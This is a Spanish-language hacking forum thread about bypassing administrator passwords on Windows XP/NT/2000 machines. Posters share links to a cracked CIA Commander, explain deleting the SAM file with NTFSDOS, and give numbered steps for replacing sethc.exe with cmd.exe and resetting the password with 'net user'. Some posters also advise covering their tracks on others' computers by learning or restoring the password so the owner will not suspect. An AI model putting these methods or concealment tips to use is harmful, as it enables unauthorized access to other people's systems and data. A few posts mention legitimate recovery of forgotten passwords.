Referente a lo que dicen con el disket, no se podria tambien hacer lo mismo pero utilizando un Cds, ejemplo: copiar el programa en u Cds y al reiniciar el Pc entramos al Bios y que el Cd sea el primario   y al iniciar el Pc en vez de reiniciar por el Disket que lo haja desde el Cd................ Se puede hacer de esa manera, es que en  la Pc donde estoy no tienen Disket, solo es una idea y me gustaria saber si se puede hacer de esa manera....

Gracias


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: toxyke en 27 Octubre 2005, 17:38 pm
waw que bue truco, hay que probarlo .
alguien conoce como quitar el security administrator 10 en win 2000 , no me deja hacer nada!!

saludos y gracias..


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Esquilax3 en 5 Noviembre 2005, 20:50 pm
El CIA Commander funciona bien, el video que a alguein no le sirva (como al principio a mi xD) es porke tambien tiene que ver la particion, hay un CIA Commander para FAT, que es el normal, y otro pa NTFS que esta por ahi en esta web, pero si funciona bien...

salu2


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: akivoy en 10 Diciembre 2005, 18:02 pm
Hola no se si sera mucho pedoir SI ME PUDEN EN VIAR EL cia commander pero la version que usan en el programa es que ami me dale el password del admin pero me dice protegido lo e podico copias y me arrojo con un nombre bien raro ODA03ED.USR algo asi es, y que podria hacer con ese archivo se pude crackiar agradeceria si me pasan ese programa que pesa mas de un mega el que yo tengo pesa 330 kbs ... graciias espero que me envien el programa ami cuenta [

uni_bruno@yahoo.es


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Albertux en 11 Enero 2006, 08:24 am
hahha yo tengo un mini mandrake (floppy) que tumba el pass de admin en el winxp

Saludos


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Vladimir V en 15 Enero 2006, 20:59 pm
Esto no es nada Nuevo ni del Otro Mundo con Rspecto a Cia Commander, se puede hacer tambien con NTFS-DOS.

Esto existe desde la apariciòn del Windows NT y su sistema de Archivos NTFS, ya que las Versiones anterios de Windows trabajan con los sistemas de archivos ya sea FAT, FAT16 o FAT32, seguridad que se podia quebar desde el MS-DOS, que facil NO.

 ::)

Bueno para ahorrales la historia se suponia que el Nuevo sistema de archivos NTFS, esto no podria ser posible y asi mantener la seguridad en el sistema de archivos. Segun Microsoft el sistema NTFS basa su seguridad en su Robusted y Estabilidad, esta en parte cierto, pero esta robusted esta constuida literalmente sobre castillos de arena que en cualquier momento se pueden venir abajo.



Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Banish en 23 Enero 2006, 21:38 pm
Yo tengo el Cia Commander (1.42 Mg), pero no me funciona. Hay dos cuentas de administrador a las cuales puedo entrar con el programa pero no reconoce que tenga contraseñas cuando si las tiene.  Alguien tiene una version que funcione??

Ban...


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: jarkambir en 1 Marzo 2006, 17:09 pm
He creado el disco de arranque del DATAPOL CIA COMMANDER y al reiniciar el ordenador con el disco metido el sistema me dice que no encuentra NTLDR, que es lo que tengo que hacer para que me funcione?? GRACIAS.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: fibonacci en 18 Marzo 2006, 01:12 am
Si entran como "A prueba de fallo" y esa cuenta de admin tiene password, no podran entrar al sistema como admin sin antes saber la pass.
En otras palabras quedaran donde empezaron, sin nada..

Solucion!, pues usar CIA Commander.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: fibonacci en 18 Marzo 2006, 01:31 am
Nunca he probado usar CIA Commaner a traves de un cd, pero yo diria que si se puede. Con una excepcion, de que tendrian que usar un cd para unos 4 o 5 archivos. Pero creo que se puede.

Lo otro que hecho es sacar la password del equipo, luego hacer modificaciones y vuelvo a poner la password antigua del equipo al usuario que se la quite, digo esto, porque CIA COmmander tiene la opcion de guardar en un archivo *.usr las contraseña y luego volver a cargarla.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: [s]KunK en 20 Marzo 2006, 23:17 pm
Aqui les dejo el link para todos aquellos q aun no tienme este excelente programa ...

http://rapidshare.de/files/16014854/Cia_Commander_sKunK_.rar.html

Ya viene Crackeado  :rolleyes:


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: StreamFiles en 21 Marzo 2006, 07:33 am
Deam es verdad que rapido fue hacerlo, me dan ganas de quedarme con linux, que jodido es windows me cae Tata Bill Gates tas quebrando........   :-X


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: dannhellsing en 22 Marzo 2006, 20:04 pm
hola, no he `podido encontrar el cia commander, alguien puede ayudarme, pasarmelo, les estaria muy agradecido, es urgente, gracias


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: hArKhAnGeL en 6 Abril 2006, 22:54 pm
hola, no he `podido encontrar el cia commander, alguien puede ayudarme, pasarmelo, les estaria muy agradecido, es urgente, gracias


Hola, han puesto como unos 15 links de donde lo podes bajar, pero en fin, aca lo tenes de nuevo:

http://www.trucoswindows.net/downloadview-details-19-cia-commander.html

Te tenes que inscribir, pero es rapido y facil...  ;)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: *-.Sub-Vorbio.-* en 15 Abril 2006, 23:37 pm
Otra aplicación similar es el CD LIVE linux "OPH crack"
Un poco lento pero efectivo, no aguanta paswords muy grandes 18 caracteres creo...


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: hArKhAnGeL en 20 Abril 2006, 22:15 pm
Lastima que el Cia Commander no funcione con CD


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: aramazd en 6 Mayo 2006, 09:30 am
Hola a todos, soy nuevo por aki, yo he utilizado tal programa y me parece una buena herramienta, segun se dice que es solo para usos exclusivos de cuando pierdas tus constraseñas...jajaja!! seguramente siempre va a ser asi, yo lo genere en un diskete y luego lo pase a un cd (lo ideal seria en un MiniDisk, por el insignificante espacio que ocupa), creando un cd-bootable lo prove en un Xp Home y en un 2000 y funciona de maravilla, me cae que con ese programita entran hasta dode se les pegue la gana, lastima que por lo regular lo encuentran en version demo, y asi no sirve de nada, la buena es la completa, aunque si se ponen a buscar y buscar y buscar y con un poco de suerte lo encuentran completito.

Con eso claro esta que windows sirve pa pura  :-X?????????? :huh:, pero ni modo, que le vamos a hacer. Saludos!! .......solo abran google y busquen y busquen y busquen y veran que lo encuentran porque lo encuentran!!!.  ;D


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: matrix_E en 10 Mayo 2006, 04:00 am
 :Dhola jedi me darias tu correo o yo te doy el mio para que me mandes el cia commander porfavor te lo agredecere


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: matrix_E en 10 Mayo 2006, 04:10 am
ya aye el cia commander en
http:trucoswindows.net
para entrar debes estar registrados suerte


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: hArKhAnGeL en 3 Junio 2006, 00:01 am
El Cia Commander no funciona en Cd

Ademas no funciona con equipos que tengan el Active Directory instalado.

De ahi en fuera, muy bonito!


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: blackcid en 21 Julio 2006, 07:46 am
un problema con el cia commander cuando utilizo la opcion user manger no aparece la opcion winnt ni windows por lo cual no puedo entrar alguien sabe a que se debe esto muxas gracias :(


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Fucko en 30 Julio 2006, 21:26 pm
El Cia Commander no funciona en Cd

Ademas no funciona con equipos que tengan el Active Directory instalado.

De ahi en fuera, muy bonito!
ehhh, si funciona en cd...
pero solo una vez....
si lo volves a usar te dice que ya ha expirado......
suerte!


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: BUSCAMINAS® en 8 Septiembre 2006, 19:07 pm
preezee


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: besk en 11 Septiembre 2006, 21:22 pm
a mi lo que me interesa de este programa es averiguar la contraseña que tiene el administrador, eso como se hace? con eso de salvar pass? y donde se guarda?como la puedo ver luego?
se puede entrar conseguir la contraseña y salir sin haberla cambiado no?
saludos


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: the_tayta en 12 Septiembre 2006, 04:02 am
ya logre encontrar el cia ...
pero tengo un problema; solo es para particiones ntfs.
alguien tiene el cia para las particiones fat32 que quiera compartir (favor de colocar algun link)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: cgarcia16 en 7 Octubre 2006, 21:36 pm
Bueno, posteo esto porque estoy realmente decepcionado de la facilidad con la cual se puede acceder localmente a un sistema XP/NT/2000.

A raíz de un post que está ahora pegado en la sección de Windows, me he enterado de la existencia de un programa que se llama Cia Commander y tan solo ocupa 358 kb.

Este programita tan pequeño y que se puede descargar con facilidad desde el Emule me ha permitido crear un disco de inicio para sistemas basados en NTFS, mediante el cual he podido acceder a todos los archivos de cualquier partición, incluyendo los que se encontraban en carpetas encriptadas con el Tweak-xp y con el hide folders. También he accedido a las carpetas de administradores que habían sido definidas como privadas, y he podido copiar los archivos a floppy o a otra particion

Con este mismo programa he podido ver a todos los usuarios registrados y cambiar la pass de administrador(o cualquier pass) en mas o menos 20 segundos, entrar al sistema y después restaurarla en 20 segundos mas.

Realmente estoy decepcionado y asqueado por la total falta de seguridad de NTFS y escribo este post para que todo el mundo tome conciencia de ello.

Bill Gates, tu Windows es una porquería  :)

Saludos


Muy bueno tio, aunque otra manera que a mi me valio fue la de entrar con un disco de inicio con la utilidad NTFSDOS en el y borrar el archivo SAM, al hacer eso le estoy borrando el password al administrador e ingresar como tal. Bueno esto da ideas para poder hacer muccho mas no creen ja,ja,ja.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: zhyzura en 7 Octubre 2006, 21:38 pm
aunque si borrar el pass del administrador terminan por enterarse, lo mejor (a mi punto de vista) es averiguar la clave asi no sospecharan.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: cgarcia16 en 7 Octubre 2006, 21:51 pm
Amigos otra forma es entrar con un disco de inicio y en el la utilidad NTFSDOS, luego solamente tendriamos que entrar y borrar el archivo SAM que es donde se almacena las contraseñas de los usuarios y emtre ellas la del administrador.  Cuando volvamos a entrar a windows el usuario administrador ya no tendria password asi de facil.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: cgarcia16 en 7 Octubre 2006, 21:52 pm
Amigos otra forma es entrar con un disco de inicio y en el la utilidad NTFSDOS, luego solamente tendriamos que entrar y borrar el archivo SAM que es donde se almacena las contraseñas de los usuarios y entre ellas la del administrador.  Cuando volvamos a entrar a windows el usuario administrador ya no tendria password asi de facil.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: pintuflas en 10 Octubre 2006, 14:10 pm
Muchas gracias por el manual y esto no se podria hacer con FAT32?
En este ordenador que estoy lo puedo hacer ya que uso ntfs pero en el otro no porque tengo FAT32 podria averiguar la contraseña sin cambiar?

He leido que el Cia Commander 2 se puede, es verdad eso?
pero no he encontrado ningun manual, puede ser porque funcione igual que el v1 pero que sea disponible para FAT32?

(Esto en un windows 2000)

Muchas gracias


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Mamsaac en 17 Noviembre 2006, 22:36 pm
una pregunta... como puedo crear una memoria usb bootable desde CIA Commander, o tan solo puedo hacerlo con un disquette?


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: OSCAAR en 9 Enero 2007, 19:42 pm
Hola a todos estoy buscando el Cia commander 2 que se ejecuta desde CD, solamente encontre el demo pero no sirve para nada, la version completa no la he podido encontrar sera que alguna persona lo tendra para que me lo pueda facilitar, se lo agradeceria inmensamente. favor enviar al correo oscararenas_8@yahoo.es, si alguien necesita el demo y lo puede crackear me escribe y yo se lo envio por correo. gracias


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: gulabyte en 11 Enero 2007, 23:13 pm
Hola a todos tengo una duda y es que he leido todos los posts del tema uno a uno y no encuentro la respuesta. Me acerco, pero mis neuronas no dan para más. No consigo hacer eso de restaurar la contraseña del administrador que tenia antes de cambiarla, es decir, que le cambio el pass, entro en esa cuenta, abro una nueva y hago otra cuenta ( la que quiero tener yo ). Todo perfecto.
Pero quiero pasar más desapercibido. Segun lo que he leido, después de hacer ésto tengo la oportunidad de restaurar el pass de la cuenta de administrador pero no consigo hacerlo. Tambien he leido sobre que se podria sacar la contraseña después de cambiarla ( aunque no sea muy lógico ) y así no necesitaria crear otra cuenta, aunque me interesa crearla.
Me podria alguien orientarme un poco ?? es que ando leyendo y leyendo y no hago mas que leer chorradas como "si dicen que te aparece el pass con el CIA Commander será cuestión de apuntarlo en un papelito y ya esta" tú crees que si fuera así andariamos como andamos de perdidos ?????????

Muchas Gracias a los que dedicáis vuestro tiempo y paciencia para ayudar, de verdad es un foro extraordinario.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: hackermaestros en 9 Junio 2007, 19:53 pm
hola amigos quisiera saber ¿como puedo crear una memoria usb bootable desde CIA Commander? ,
 o  solo puedo hacerlo con un CD?
tambien quisiera saber como puedo hacerlo bootear desde el cd el cia comander  ;D


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: akbal en 13 Junio 2007, 23:02 pm
es muy similar al totalcomander la diferencia que el total comander no nesecita ser instalado solo funka como cd auxiliar..... ;D


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Grave en 13 Junio 2007, 23:22 pm
hola amigos quisiera saber ¿como puedo crear una memoria usb bootable desde CIA Commander? ,
 o  solo puedo hacerlo con un disquette?
tambien quisiera saber como puedo hacerlo bootear desde el cd el cia comander  ;D

Lo que voy a decirte son especulacion porque no he tenido tiempo de probarlo.... el programa ULTRAISO tiene una opcion para crear una imagen de diskete, una para extraer la informacion de arranque de una ISO y otra para añadir informacion de arranque a una ISO. Con todo eso, creas la imagen del diskette, luego le extraes la informacion de arranque y por ultimo quemas un CD con esa informacion de arranque y listo. Para lo de la USB creo que tengo ahí una informacion de como hacerlo con la informacion de arranque pero no lo he leido :P


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: hackermaestros en 14 Junio 2007, 18:28 pm
amigos podrian explicarse un poco mejor  :xD
o dejar link de sitios donde te explique hacer eso del ultraiso para crear el cd arranque de cia comander o bootear de usb  :xD

gracias


Título: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: fjrmorenod en 4 Octubre 2007, 06:21 am
Buenas amigos

Mi duda es la siguiente ya use el cia commander y efectivamente resulto pero mi usuario esta en otro dominio y no se como cambiarles los privilegios para poderme conectar al msn ya que lo hago pero con la conexion HTTP de messenger y el usuario y la clave de otra maquina pero esta está pronta a vencer y no voy a poder obtenerla como puedo encontrar la clave de admon y hacerlo con esa que no se vence

MuchaS GRACIAS AMIGOS


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: 54yk3r en 18 Octubre 2007, 16:41 pm
el problema del cia es que el si quieres cambiar la contraseña pues bien, pero si quieres guardarla te lo guarda en un disquette con extension usr. asique haber como desencriptas eso..
yo te recomiendo el opchcrak lee el ultimo post

http://foro.elhacker.net/index.php/topic,181800.0.html (http://foro.elhacker.net/index.php/topic,181800.0.html)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: jamesaddicted en 28 Noviembre 2007, 16:09 pm
hay una solucion alternativa a todo esto, bajense este pequeñisimo programa que mas es una instruccion..  se llama AccMakerbyKC
lo que hace es crearte una cuenta de administrador en el sistema y asi entras en 20 segundos jeje, pa los q no lo entendieron primero entras a la cuenta q esta limitada o bajo un administrador normal, y ahi lo ejecutas, este lo creas entonces cierras sesion vuelves a abrir y te aparecera la q creaste y entras normal pero sin contraseña ;)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Aser7 en 30 Enero 2008, 17:50 pm
Buena aportación hay que probar esa utilería gracias.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: alzehimer_cerebral en 6 Febrero 2008, 19:08 pm
Pues de momento he probado el AccMakerbyKC y crea una cuenta pero con permisos limitados..

Ademas si intentas acceder a los documentos privados hechos desde la cuenta de Administrador te dice quete pires..

Algun metodo alternativo para entrar como Administrador y tener acceso a todos los documentos??

Salu2

alzehimer_cerebral

P.d o codigo que muestre la vulnerabilidad


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: sugar_ray en 11 Abril 2008, 21:42 pm
existe un metodo o programa similar desde windows para ingresar a un winXP pero por red LAN?

salu2


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: relb049 en 23 Abril 2008, 19:49 pm
Hermano los links no funcionan y tengo el mismo problema, pana necesito la informacion tengo Xp Pro, urgente....



Necesitas cambiar los permisos de la carpeta para poder acceder a ella, si tu Xp es Pro lo tienes explicado url=http://www.elhacker.net/foro/index.php/elhackernet/t18479.htm
Home Edition es un poco mas complicado y lo tienes explicado url=http://www.CENSURADO/foro/index.php?showtopic=241




Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: relb049 en 23 Abril 2008, 20:13 pm
al igual que el pana Kanitro77

tengo este problema.... quiero recuperar los archivos de un usuario con clave y me sale "acceso denegado", como puedo pasar este punto de seguridad de WinXP Pro, para obtener las carpetas?...si alguien me puede ayudar gracias

si alguien tiene la solucion mi correo es relb049@hotmail.com. de pana es urgente... :-(

un pana en la respuesta que le da envia unos links pero no abren al hacer clic sobre estos (pdata: la respuesta 26 o 27)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: genteags en 24 Abril 2008, 01:55 am
que tal, BUENO, LA VERDAD, QUE SI ME AH SIDO DE GRAN AYUDA, PERO AHORA TENGO UN PROBLEMA MAS COMPLICADO, TENGO UNA LAP TOP, QUE NO TRAE NADA, ES DECIR, NI UNIDAD DE CD, NI DE DISCO, Y NO PUEDO ENTRAR DE NINGUNA MANERA, SOLO LOFRO VER LA PC EN LA RED, PERO CUANDO QUIERO INGRESAR ME PIDE PASSWORD, PODRIA ALGUIEN DE USTEDES, DECIRME QUE PODRIA HACER.

SE LOS AGRADECERIA INFINITAMENTE


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: verbal en 28 Abril 2008, 22:28 pm
podrias colocar el programa en un pendrive y, si tu bios lo permite, arrancar desde esa unidad usb.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: haobaobatusai en 15 Junio 2008, 19:31 pm
y hace mas de 2 años conozco un livecd basado en ubuntu que escanea la particion de windows y decifra las claves y las entrega en txt


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: G0d_50n en 28 Julio 2008, 11:16 am
bueno de lo que e visto nadie a tratado con el ARC es un progrma que quita todoas las contraseñas del win y tambien sirve remotamente sabiendolo manejar es como el cia commander y los demas. busquenlo
saludos.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: JORLUIS22 en 22 Agosto 2008, 16:25 pm
hola a todos recin me registro..
gracias a todos..

una pregunta.

he usado sin problemas en CIA Commander en una PC, pero ahora al ejecutar elijo el usuario administrador, me dice q el usuario esta locked, me pide unloked, le doy "yes"  luego aceptar pero al cambiar la clave me dice q usuario no tiene clave q ejecute el administrador de cuentas de Win....

no se q paso pero antes entraba normal...

Saludos

Jorluis22


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: ByJavi20 en 27 Octubre 2008, 06:25 am
Ponete las pilas pollodelelo... Usa la mula...!!! Sirve para buscar y descargar. En google busca el instalador.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Arkangel-לוחם של אלוהים en 4 Noviembre 2008, 02:42 am
hola Azazel  me han servido mucho los puntos que has conpartido en el foro. ::)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Razgriz en 4 Noviembre 2008, 12:13 pm
Hola, reciente mente me han pasado un articulo muy interesante sobre todo este tema de acceder a windows sin saber la password. El articulo, que me lo paso PaPeRro es este:
http://www.governmentsecurity.org/articles3/hacking_your_computer_physical_access_is_total_access.php (http://www.governmentsecurity.org/articles3/hacking_your_computer_physical_access_is_total_access.php)

leedlo porque es muy interesante!!


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: berz3k en 5 Noviembre 2008, 13:50 pm
La gran mayoria de los tips quie se mencionan es simple insercion dee un CD-Live, montaje (mount) y buala, lo mismo con algun USB, facil de protegerce, ademas necesitas acceso fisico.

-berz3k.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: alexvem en 16 Noviembre 2008, 06:17 am
dentro de 1 sesion, como saco el password de admin?


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: -TITAN- en 3 Diciembre 2008, 03:10 am
PUES NO ME HE FIJADO SI YA RESPONDIERON CON ESTO PERO HAY UNA MANERA MAS FACIL , EN LA que PUEDES ENTRAR COMO ADMINISTRADOR EN XP


EN LA CASILLA DONDE PIDE CONTRASEÑA

SE OPRIME CRTL+ALT+SUPR (3 VECES SEGUIDAS) TE MANDARA AL OTRO TIPO DE INICIO DE SECION NOMAS HAY que PONERLE (Administrador ) Y DARLE ENTER Y ENTRA EN ADMIN LE KITAS LAS CONTRASEÑAS A LAS DEMAS  Y LISTO


ESTO FUNCIONA EN TODOS LOS EKIPOS DE MARCA HP ETC


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Javim€tal en 14 Diciembre 2008, 00:01 am
Cita de: Titan
PUES NO ME HE FIJADO SI YA RESPONDIERON CON ESTO PERO HAY UNA MANERA MAS FACIL , EN LA que PUEDES ENTRAR COMO ADMINISTRADOR EN XP


EN LA CASILLA DONDE PIDE CONTRASEÑA

SE OPRIME CRTL+ALT+SUPR (3 VECES SEGUIDAS) TE MANDARA AL OTRO TIPO DE INICIO DE SECION NOMAS HAY que PONERLE (Administrador ) Y DARLE ENTER Y ENTRA EN ADMIN LE KITAS LAS CONTRASEÑAS A LAS DEMAS  Y LISTO


ESTO FUNCIONA EN TODOS LOS EKIPOS DE MARCA HP ETC


Titan, si la cosa fuera tan facil no se habrian molestado en crear ese programa. El Cia Commander viene bien cuando quieres entrar en un pc y te das cuenta de que la cuenta de administrador también te pide una contraseña. En tu caso puedes entrar a windows pulsando "intro" porque no pusiste contraseña a esta cuenta, que se hace cuando vas a instalar windows


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Og. en 1 Enero 2009, 18:27 pm
si el caso es entrar a ver los archivos de tu equipo...
no uses ese tal "cia comander"
descarga ubuntu 8.10 version desktop live cd (es una imagen iso) dercargala aqui: http://tezcatl.fciencias.unam.mx/ubuntu-releases/intrepid/ubuntu-8.10-desktop-i386.iso (http://tezcatl.fciencias.unam.mx/ubuntu-releases/intrepid/ubuntu-8.10-desktop-i386.iso)

despues lo quemas en un cd y siempre que lo metas al inicio te aparecera una ventada que te dice
1.-probar ubuntu sin alterar su equipo
2.-instalar ubuntu en su equipo

le das en la primera y va a cargar un entorno grafico
con el cual puedes buscar facilmente los archivos de tu disco duro
y si no estas seguro cual es el nombre del archivo que buscas simplemente ejecutalo en ubuntu

y quien sabe hasta lo instalas y tendras un sistema sin virus, rapido, seguro y con milies y miles de programas gratuitos

por eso y por mucho mas YO USO UBUNTU


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: h3r0n en 10 Enero 2009, 14:08 pm
La verdad esque es patético lo de la seguridad en Windows, tambien yo uso ubuntu jeje.

Yo he probado el Cia Commander en la virtual box y funciona bien, pero esque hasta se puede acceder al pc sin eso. Entrando a modo a prueba de fallos y como administrador, ya está. Creo que puedes cambiar los privilegios y todo... en fin...


UBUNTU PARA SIEMPRE


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: 1010_nqn en 3 Febrero 2009, 18:49 pm
es que ni siquiera hace falta ubuntu ni cia commander con cualquier windows live desde cd o usb puedes entrar al contenido del hd de cualquier!!!!! windows, no entiendo si la idea es sacar info para que quieres sr administrador xD


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Novlucker en 3 Febrero 2009, 19:02 pm
Si te fijas el post es del 2003, y si bien los live-cd existen desde antes, se popularizaron mucho después, por eso se quería ser administrador, además de que muchas veces necesitas ingresar como admin para tocar o instalar algo, y no solo llevarte info  :¬¬

Saludos


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: hitori batusai en 4 Febrero 2009, 03:04 am
Es que ese es el chiste de entrar como admin instalar algo o arreglar algo, yo lo hacia en mi u porque ocupaba esos permisos para programar y correr mis programas de manera optima, si es para robar datos pues una aberracion y no tiene gracia


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: 1010_nqn en 4 Febrero 2009, 09:04 am
buen detalle el de la fecha de inicio del post, me quede con la idea que daban un par de ellos y en ninguna hablaban de reparar, mis disculpas, de paso no estaria bueno borrar algo tan viejo?


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: 50l3r en 3 Marzo 2009, 23:44 pm
hay una forma sin utilizar el cia commander y es teniendo un live cd o usb de windows xp

1-entras al live cd
2-te vas al directorio de windows , copias el archivo sethc.exe a sethc.cpy
3-copias el archivo cmd, y lo renombras a sethc.exe sustituyendo a el actual sethc
3-reinicias
4-vas al panel del login del administrador
5-aprietas 5 veces la tecla shift (flexa xd)
6-saldra una cmd
7-pones net user administrador *
8-escribes la nueva contraseña dos veces y entras

si tienes la cmd puedes entrar a windows con escribir explorer pero este te llevara al user system, no al que tu quieras

tambien puedes cambiar las contraseñas de estos metodos

poner en cmd: control userpasswords2
o sino: compmgmt.msc
o si tienes el explorer abierto lo haces desde cuentas de usuario

saludos


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: paciente!! en 4 Marzo 2009, 02:13 am
hay una forma sin utilizar el cia commander y es teniendo un live cd o usb de windows xp

1-entras al live cd
2-te vas al directorio de windows , copias el archivo sethc.exe a sethc.cpy
3-copias el archivo cmd, y lo renombras a sethc.exe sustituyendo a el actual sethc
3-reinicias
4-vas al panel del login del administrador
5-aprietas 5 veces la tecla shift (flexa xd)
6-saldra una cmd
7-pones net user administrador *
8-escribes la nueva contraseña dos veces y entras

si tienes la cmd puedes entrar a windows con escribir explorer pero este te llevara al user system, no al que tu quieras

tambien puedes cambiar las contraseñas de estos metodos

poner en cmd: control userpasswords2
o sino: compmgmt.msc
o si tienes el explorer abierto lo haces desde cuentas de usuario

saludos


si, muy bien, pero que pasa antes de iniciar con la livecd??

- Antes de eso está la BIOS, y si tiene contraseña (en el caso de no recordarla) como accedes?? (deberá haber alguna manera, seguro!! yo ahora mismo no lo se).
-O incluso que las opciones de arranque estén deshabilitadas y no las puedas modificar. En ese caso no puedes adaparlo para arrancar desde un CD o USB.

Si me he equivocado en algo que me rectifiquen. Gracias.

Saludos pacientes!!!


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: 50l3r en 4 Marzo 2009, 16:03 pm
Código:
si, muy bien, pero que pasa antes de iniciar con la livecd??

- Antes de eso está la BIOS, y si tiene contraseña (en el caso de no recordarla) como accedes?? (deberá haber alguna manera, seguro!! yo ahora mismo no lo se).
-O incluso que las opciones de arranque estén deshabilitadas y no las puedas modificar. En ese caso no puedes adaparlo para arrancar desde un CD o USB.

Si me he equivocado en algo que me rectifiquen. Gracias.

Saludos pacientes!!!

quitas la pila y dejas que la memoria cmos se reinicie


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: paciente!! en 7 Marzo 2009, 01:43 am
Código:
si, muy bien, pero que pasa antes de iniciar con la livecd??

- Antes de eso está la BIOS, y si tiene contraseña (en el caso de no recordarla) como accedes?? (deberá haber alguna manera, seguro!! yo ahora mismo no lo se).
-O incluso que las opciones de arranque estén deshabilitadas y no las puedas modificar. En ese caso no puedes adaparlo para arrancar desde un CD o USB.

Si me he equivocado en algo que me rectifiquen. Gracias.

Saludos pacientes!!!

quitas la pila y dejas que la memoria cmos se reinicie

Pero hay que andar desmontando. Lo suyo sería no hacer eso, pero si es la única forma... de todas formas gracias por responderme.

Saludos pacientes!!


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: 50l3r en 7 Marzo 2009, 01:45 am
nadie pone pass en la bios, eso es de gente que se aburre

yo no la pondria, si te la olvidas tienes que quitar la pila y si esta en garantia no puedes abrir la caja

ademas si es un portatil...

fiu jaja


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: paciente!! en 7 Marzo 2009, 02:00 am
El caso es que el pc es de un amigo, se le olvidó la pass de admin y me pidió ayuda. Quise entrar con una live cd pero no podía de ninguna manera arrancar desde el cd ni del usb. Entré en la bios y no me dejaba modificar para arrancar por alguno de ellos. Encima va el tio y le pone contraseña a la bios también. Por eso te digo, que no se de alguna forma para acceder sin antes formatear. Y claro, no queremos abrirlo porque tiene 2 meses y medio.... En fin, un desastre.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: 50l3r en 26 Mayo 2009, 02:18 am
esto no vale, tiene la bios

las bios como award phoenix etc suelen tener pass por defecto, ademas de la que establece el usuario, en caso de olvido,

http://foro.elhacker.net/hacking_avanzado/contrasenas_por_defecto_en_las_bios_routers_y_claves_wpa-t99273.0.html

El cia commander no es muy etico, a mi me gusta encontrar fallas en win y valerme de ellas para escalar puestos jeje

